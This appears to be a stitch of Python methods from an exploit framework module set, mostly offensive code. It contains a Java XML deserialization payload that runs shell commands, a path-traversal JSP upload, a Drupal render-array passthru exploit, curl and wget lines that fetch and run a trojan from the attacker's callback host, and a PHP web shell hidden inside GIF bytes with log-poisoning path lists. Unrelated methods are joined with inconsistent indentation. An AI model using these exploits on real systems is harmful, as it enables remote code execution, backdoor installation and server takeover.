    def run(self):
        """Send the XML payload carrying ``self.cmd`` to ``/ws/rest/v1/d2`` and return 1.

        Argument handling: the host comes from the target, port/sslport/
        https/basepath/cmd from ``self.argsDict`` with the instance
        attributes as defaults. With an empty ``cmd`` the method switches to
        trojan mode (``self.TROJANMODE = 1``): it generates the trojan,
        serves it from a background HTTP server and uses a curl
        download-and-run line as the command. Otherwise the supplied command
        is used as-is.

        Returns:
            1 unconditionally once the POST has been sent; the server reply
            is only logged when a plain command (not the trojan) was run.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        # sslport and https are parsed but not used by this method, and
        # self.protocol (read where the URL is built below) is never assigned
        # here -- presumably both are handled elsewhere in the class; verify.
        self.sslport = int(self.argsDict.get("sslport", self.sslport))
        self.https = int(self.argsDict.get("https", self.https))
        self.basepath = self.argsDict.get("basepath", self.basepath)
        self.cmd = self.argsDict.get("cmd", self.cmd)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            self.maketrojan()
            self.TROJANMODE = 1
            # self.trojanname and self.callback.ip are assumed to be set by
            # maketrojan() / the framework -- not visible in this block.
            self.cmd = "rm -f /tmp/" + self.trojanname + "; /usr/bin/curl -o /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; /bin/chmod 777 /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
            # The trojan file is served from a background thread.
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        ua = spkproxy.UserAgent("", exploit=self)
        ua.addHeader(
            "User-Agent",
            "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
        )
        ua.addHeader("Content-Type", "text/xml")

        # Exploitation
        # Serialized Java object graph in XML; the innermost element is a
        # java.lang.ProcessBuilder whose <command> is "/bin/sh -c <cmd>".
        # NOTE(review): self.cmd is interpolated verbatim at %s -- a command
        # containing '<' or '&' would produce malformed XML instead of being
        # escaped.
        params = """<map>
 <entry>
   <jdk.nashorn.internal.objects.NativeString>
     <flags>0</flags>
     <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
       <dataHandler>
         <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
           <is class="javax.crypto.CipherInputStream">
             <cipher class="javax.crypto.NullCipher">
               <initialized>false</initialized>
               <opmode>0</opmode>
               <serviceIterator class="javax.imageio.spi.FilterIterator">
                 <iter class="javax.imageio.spi.FilterIterator">
                   <iter class="java.util.Collections$EmptyIterator"/>
                   <next class="java.lang.ProcessBuilder">
                     <command>
                       <string>/bin/sh</string>                       
                       <string>-c</string>                       
                       <string>%s</string>                       
                     </command>
                     <redirectErrorStream>false</redirectErrorStream>
                   </next>
                 </iter>
                 <filter class="javax.imageio.ImageIO$ContainsFilter">
                   <method>
                     <class>java.lang.ProcessBuilder</class>
                     <name>start</name>
                     <parameter-types/>
                   </method>
                   <name>foo</name>
                 </filter>
                 <next class="string">foo</next>
               </serviceIterator>
               <lock/>
             </cipher>
             <input class="java.lang.ProcessBuilder$NullInputStream"/>
             <ibuffer></ibuffer>
             <done>false</done>
             <ostart>0</ostart>
             <ofinish>0</ofinish>
             <closed>false</closed>
           </is>
           <consumed>false</consumed>
         </dataSource>
         <transferFlavors/>
       </dataHandler>
       <dataLen>0</dataLen>
     </value>
   </jdk.nashorn.internal.objects.NativeString>
   <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
 </entry>
 <entry>
   <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
 </entry>""" % self.cmd

        url = "/ws/rest/v1/d2"
        # "/%s%s" puts a slash before basepath, so basepath is presumably
        # stored without a leading slash -- verify against the defaults.
        mainurl = "%s://%s:%d/%s%s" % (self.protocol, self.host, self.port,
                                       self.basepath, url)
        data = ua.POST(mainurl, params)

        # Only the part of the reply before any HTML document is logged, and
        # only for a plain command; the comparison assumes TROJANMODE starts
        # at 0 (initialised elsewhere).
        if self.TROJANMODE == 0:
            self.log('[D2] %s' % (data.split('<!DOCTYPE html>')[0]))

        return 1
  def upload_file(self):
    """Upload the JSP from ``self.filename`` via ``/mapviewer/addmapdata`` and then request it.

    The file is read, its CALLBACK_IP / CALLBACK_PORT placeholders are
    replaced with the framework callback address, and a small GeoJSON
    document is prepended before the content is sent as the ``layerFile``
    part of a multipart POST whose ``fileName`` field is
    ``../../../../d2.jsp``. A GET to ``/mapviewer/d2.jsp`` follows. Both
    server replies are discarded.

    Side effects: sets ``self.protocol`` from ``self.https`` and, for https,
    replaces ``self.port`` with ``self.sslport``.

    Returns:
        1 unconditionally.
    """
    # Open JSP file
    # NOTE(review): open/read/close without try/finally -- the handle is not
    # closed if read() raises; a with-statement would close it in every case.
    f = open(self.filename, "r")
    fdata = f.read()
    f.close()

    # Template placeholders are substituted as plain text.
    fdata = fdata.replace("CALLBACK_IP", self.callback.ip)
    fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port))

    json = """
{
  "type": "FeatureCollection",
  "features": [
    {
      "type": "Feature",
      "geometry": {
        "type": "LineString",
        "coordinates": [
          [
            1.061553955078125,
            48.3416461723746
          ],
          [
            5.719757080078125,
            48.2246726495652
          ],
          [
            3.434600830078125,
            45.21300355599396
          ],
          [
            1.061553955078125,
            48.3416461723746
          ]
        ]
      },
      "properties": {}
    }
  ]
}
"""

    # The GeoJSON document precedes the JSP content in the uploaded body.
    fdata = json+fdata

    if self.https == 0:
        self.protocol = "http"
    else:
        self.protocol = "https"
        self.port = self.sslport

    ua = spkproxy.UserAgent("", exploit=self)

    # Upload JSP file
    # Hand-built multipart body: the part delimiter must equal "--" followed
    # by the boundary given in the Content-Type header below. The per-part
    # Content-Length is non-standard but is what the original sends.
    params = '-----------------363752669374944\r\nContent-Disposition: form-data; name="fileName"\r\n\r\n../../../../d2.jsp\r\n-----------------363752669374944\r\nContent-Disposition: form-data; name="layerFile"\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------363752669374944--\r\n'%(len(fdata), fdata)
    url = '/mapviewer/addmapdata'
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    ua.addHeader("Content-Type", "multipart/form-data; boundary=---------------363752669374944")
    ua.addHeader("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1")
    # The upload reply is not inspected; success is not verified here.
    data = ua.POST(mainurl, params)

    # Execute uploaded JSP file
    url = "/mapviewer/d2.jsp"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    # Reply likewise unused; any result is expected via the callback.
    data = ua.GET(mainurl)

    return 1
    def __init__(self):
        """Initialise exploit state.

        Sets a placeholder user agent, an empty name, ``webserverport`` (0,
        see inline comment), the GIF-wrapped PHP payload in ``self.shell``
        and the list of candidate log-file paths in ``self.log_paths``.
        """
        canvasexploit.__init__(self)
        #hostname="http://google.com"
        #elf.hostname=hostname
        self.ua = spkproxy.UserAgent("")  #placeholder
        self.name = ""
        #self.ssl=""
        self.webserverport = 0  #set to non-zero to make it an RFI exploit

        # self.shell: the first six bytes spell "GIF89a", followed by binary
        # image data, then a PHP block, then more binary data. The PHP prints
        # the literal markers 'startz' / 'endz' around the output of
        # passthru()/eval() applied to the base64-decoded request parameters
        # SERVER_INFO and SERVER_INFO2 -- those fixed strings are the
        # recognisable part of this payload's traffic.
        self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\
            chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\
            chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\
            chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\
            chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\
            chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+\
            """<?php 
	    error_reporting(0);
	    ini_set('max_execution_time',0);
	    print 'startz';
	    passthru(base64_decode($_REQUEST[SERVER_INFO]));
	    eval(base64_decode($_REQUEST[SERVER_INFO2]));
	    print 'endz';
	    exit;
	    ?>"""+\
            chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\
            chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\
            chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\
            chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\
            chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\
            chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\
            chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\
            chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
            chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\
            chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\
            chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\
            chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\
            chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\
            chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\
            chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\
            chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\
            chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\
            chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\
            chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
            chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
            chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\
            chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\
            chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
            chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\
            chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
            chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\
            chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\
            chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\
            chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\
            chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\
            chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\
            chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\
            chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
            chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\
            chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
            chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\
            chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\
            chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\
            chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\
            chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\
            chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\
            chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\
            chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\
            chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\
            chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\
            chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\
            chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\
            chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\
            chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\
            chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\
            chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\
            chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\
            chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\
            chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\
            chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\
            chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\
            chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\
            chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\
            chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
            chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\
            chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\
            chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\
            chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\
            chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\
            chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\
            chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\
            chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00)

        # Relative-traversal candidates for Apache/httpd access and error logs
        # at several directory depths. Only defined here; consumed elsewhere.
        self.log_paths = [
            "../../../../../var/log/apache2/access.log",
            "../../../../../var/log/apache2/error.log",
            "../../../../../var/log/httpd/access_log",
            "../../../../../var/log/httpd/error_log",
            "../apache/logs/error.log", "../apache/logs/access.log",
            "../../apache/logs/error.log", "../../apache/logs/access.log",
            "../../../apache/logs/error.log",
            "../../../apache/logs/access.log",
            "../../../../apache/logs/error.log",
            "../../../../apache/logs/access.log",
            "../../../../../apache/logs/error.log",
            "../../../../../apache/logs/access.log", "../logs/error.log",
            "../logs/access.log", "../../logs/error.log",
            "../../logs/access.log", "../../../logs/error.log",
            "../../../logs/access.log", "../../../../logs/error.log",
            "../../../../logs/access.log", "../../../../../logs/error.log",
            "../../../../../logs/access.log",
            "../../../../../etc/httpd/logs/access_log",
            "../../../../../etc/httpd/logs/access.log",
            "../../../../../etc/httpd/logs/error_log",
            "../../../../../etc/httpd/logs/error.log",
            "../../../../../var/www/logs/access_log",
            "../../../../../var/www/logs/access.log",
            "../../../../../usr/local/apache/logs/access_log",
            "../../../../../usr/local/apache/logs/access.log",
            "../../../../../var/log/apache/access_log",
            "../../../../../var/log/apache/access.log",
            "../../../../../var/log/access_log",
            "../../../../../var/www/logs/error_log",
            "../../../../../var/www/logs/error.log",
            "../../../../../usr/local/apache/logs/error_log",
            "../../../../../usr/local/apache/logs/error.log",
            "../../../../../var/log/apache/error_log",
            "../../../../../var/log/apache/error.log",
            "../../../../../var/log/access_log",
            "../../../../../var/log/error_log",
            "../../../../../../var/log/apache2/error.log"
        ]
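    def start(self, widget):
        """GTK handler for the start button: log in to the Nessus server and list its scans.

        Reads host, port, login and password from the dialog widgets into
        ``self.qhost`` / ``self.port`` / ``self.login`` / ``self.password``,
        POSTs the credentials as JSON to ``self.loginurl``, keeps the session
        token in ``self.token`` (sent back as the ``X-Cookie`` header) and
        fills ``self.treestore_3`` with one row per scan: name, creation time
        formatted in UTC, id.

        Args:
            widget: the GTK widget that emitted the signal (unused).

        Returns:
            None. Every failure is reported through ``self.log`` and ends the
            handler early instead of raising into the GTK main loop (a
            non-JSON reply used to raise ValueError out of the callback).
        """
        self.treestore_3.clear()

        # Each required field is stored on self as it is read; the first
        # empty one aborts, so later attributes stay untouched (as before).
        required = (
            ("selectedhost", "qhost", "Nessus Server IP is empty"),
            ("serverport", "port", "Nessus Server port is empty"),
            ("login", "login", "Nessus login is empty"),
            ("password", "password", "Nessus password is empty"),
        )
        for widget_name, attr, problem in required:
            value = self.wTree2.get_widget(widget_name).get_text()
            setattr(self, attr, value)
            if value == "":
                self.log("[D2 LOG] ERROR: %s" % problem)
                return

        postdata = {
            'username': self.login,
            'password': self.password,
        }
        urldata = json.dumps(postdata)
        mainurl = "https://" + self.qhost + ":" + self.port
        headers = [("Content-Type", "application/json")]

        # Login and get token
        UA = spkproxy.UserAgent(mainurl, exploit=self)
        data = UA.POST(self.loginurl, data=urldata, extraheaders=headers)
        response = self._decode_nessus_reply(data, "login")
        if response is None:
            return

        if "token" not in response:
            self.log("[D2 LOG] Nessus ACCESS DENIED")
            return

        # Only the session token is kept for later requests; the password is
        # never written to the log.
        self.token = response["token"]
        UA.addHeader("X-Cookie", "token=%s" % self.token)

        # Get scan list
        data = UA.GET(self.scanurl)
        response = self._decode_nessus_reply(data, "scan list")
        if response is None:
            return

        # Download scan list and update treeview
        if "scans" not in response:
            self.log("[D2 LOG] No scan available")
            return

        for scan in response["scans"]:
            # creation_date is an epoch timestamp; it is displayed as UTC.
            created = time.strftime("%a, %d %b %Y %H:%M:%S",
                                    time.gmtime(int(scan["creation_date"])))
            self.treestore_3.append(None, [scan["name"], created, scan["id"]])

    def _decode_nessus_reply(self, data, stage):
        """Parse one JSON reply; log and return None when it is not a JSON object.

        Args:
            data: raw response body returned by ``spkproxy.UserAgent``.
            stage: short description for the log line (e.g. "login").

        Returns:
            The decoded dict, or None when ``data`` is missing, is not valid
            JSON, or decodes to something other than a dict.
        """
        try:
            decoded = json.loads(data)
        except (TypeError, ValueError):
            self.log("[D2 LOG] ERROR: non-JSON reply during %s" % stage)
            return None
        if not isinstance(decoded, dict):
            self.log("[D2 LOG] ERROR: unexpected reply shape during %s" % stage)
            return None
        return decoded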
    def run(self):
        """Two-request flow against the ``user/password`` form carrying ``self.cmd``.

        Argument handling mirrors the other ``run`` methods: host from the
        target, the rest from ``self.argsDict``. With an empty ``cmd`` the
        trojan mode (``self.TROJANMODE = 1``) builds a wget download-and-run
        line for the generated trojan and serves the file from a background
        HTTP server. ``self.https`` selects the scheme and, when non-zero,
        swaps ``self.port`` for ``self.sslport``.

        Returns:
            0 when the first reply contains no ``form_build_id``; otherwise 1
            after the second POST. For a plain command the text preceding the
            JSON command array in the reply is logged.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.sslport = int(self.argsDict.get("sslport", self.sslport))
        self.https = int(self.argsDict.get("https", self.https))
        self.basepath = self.argsDict.get("basepath", self.basepath)
        self.cmd = self.argsDict.get("cmd", self.cmd)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            self.TROJANMODE = 1
            self.maketrojan()
            # NOTE(review): no space before the appended "&& ..." fragments;
            # sh tokenises "&&" on its own, but this is fragile to edit.
            self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname
            self.cmd += "&& chmod 777 /tmp/" + self.trojanname
            self.cmd += "&& /tmp/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        if self.https == 0:
            self.protocol = "http"
        else:
            self.protocol = "https"
            self.port = self.sslport

        ua = spkproxy.UserAgent("", exploit=self)

        # Render-array keys (#post_render / #type / #markup) travel in the
        # query string with '#' already encoded as %23; self.cmd is appended
        # URL-quoted. "/%s%s%s" puts a slash before basepath, so basepath is
        # presumably stored without a leading slash -- verify.
        url = "/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]="
        mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port,
                                         self.basepath, url,
                                         urllib.quote(self.cmd))
        params = urllib.urlencode({
            '_triggering_element_name': 'name',
            'form_id': 'user_pass'
        })
        data = ua.POST(mainurl, params)

        # The first reply must expose a form_build_id; the second request
        # references it in its path and body.
        m = re.search('name="form_build_id" value="([^"]+)"', data)
        if m is None:
            self.log('[D2] form_build_id not found')
            return 0

        form_build_id = m.group(1)
        url = "/?q=file/ajax/name/%23default_value/"
        mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port,
                                         self.basepath, url, form_build_id)
        params = urllib.urlencode({'form_build_id': form_build_id})
        data = ua.POST(mainurl, params)

        # Plain-command mode: whatever precedes the '[{"command":"settings",...'
        # JSON in the reply is treated as the output; otherwise the raw reply
        # is logged. The comparison assumes TROJANMODE starts at 0.
        if self.TROJANMODE == 0:
            m = re.search('(.+?)\\[\\{"command":"settings","settings"', data,
                          re.DOTALL)
            if m is not None:
                self.log('[D2] %s' % m.group(1).strip())
            else:
                self.log(data)

        return 1
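	def download(self, widget):
		"""GTK handler: show the scan-selection dialog and download the chosen Nessus reports.

		Builds the dialog from ``simple2.glade``, wires its signals and, on
		OK, fetches every selected report (third tree-store column) by
		logging in to the Nessus server and POSTing the report reference to
		``self.reporturl``. Each report is written below
		``self.exploitpath + "reports/"`` and its path is appended to
		``self.ReportFiles`` and ``self.treestore_2``.

		Args:
			widget: the GTK widget that emitted the signal (unused).

		Returns:
			None.
		"""
		self.SelectedScan = []
		column_names = ['Name', 'Date', 'Reference']
		gladefile = self.exploitpath + "simple2.glade"
		self.wTree2 = gtk.glade.XML(gladefile)

		handlers = {
			"on_start_clicked": self.start,
			"on_delreport_toggled": self.activatedel,
			"on_deselectall_clicked": self.deselectall,
			"on_selectall_clicked": self.selectall,
		}
		self.wTree2.signal_autoconnect(handlers)

		self.loaddlg = self.wTree2.get_widget("exploit_dialog")

		# The icon is cosmetic: a missing or unreadable file must not stop the dialog.
		try:
			self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
		except Exception:
			pass

		# Init reports treeview
		self.treeview_3 = self.wTree2.get_widget("mytree")
		self.treestore_3 = gtk.TreeStore(str, str, str)

		self.treeview_3.set_show_expanders(False)
		self.treeview_3.set_model(self.treestore_3)
		self.treeselection = self.treeview_3.get_selection()
		self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)

		# One resizable, sortable text column per field, bound to the store
		# column of the same index.
		for index, title in enumerate(column_names):
			column = gtk.TreeViewColumn(title, gtk.CellRendererText(), text=index)
			column.set_resizable(True)
			column.set_sort_column_id(index)
			self.treeview_3.append_column(column)

		# Start downloader dialog
		result = self.loaddlg.run()

		if result == gtk.RESPONSE_OK:
			if self.treeselection.count_selected_rows() > 0:
				model, paths = self.treeselection.get_selected_rows()
				for path in paths:
					row_iter = self.treestore_3.get_iter(path)
					self.SelectedScan.append(model.get_value(row_iter, 2))
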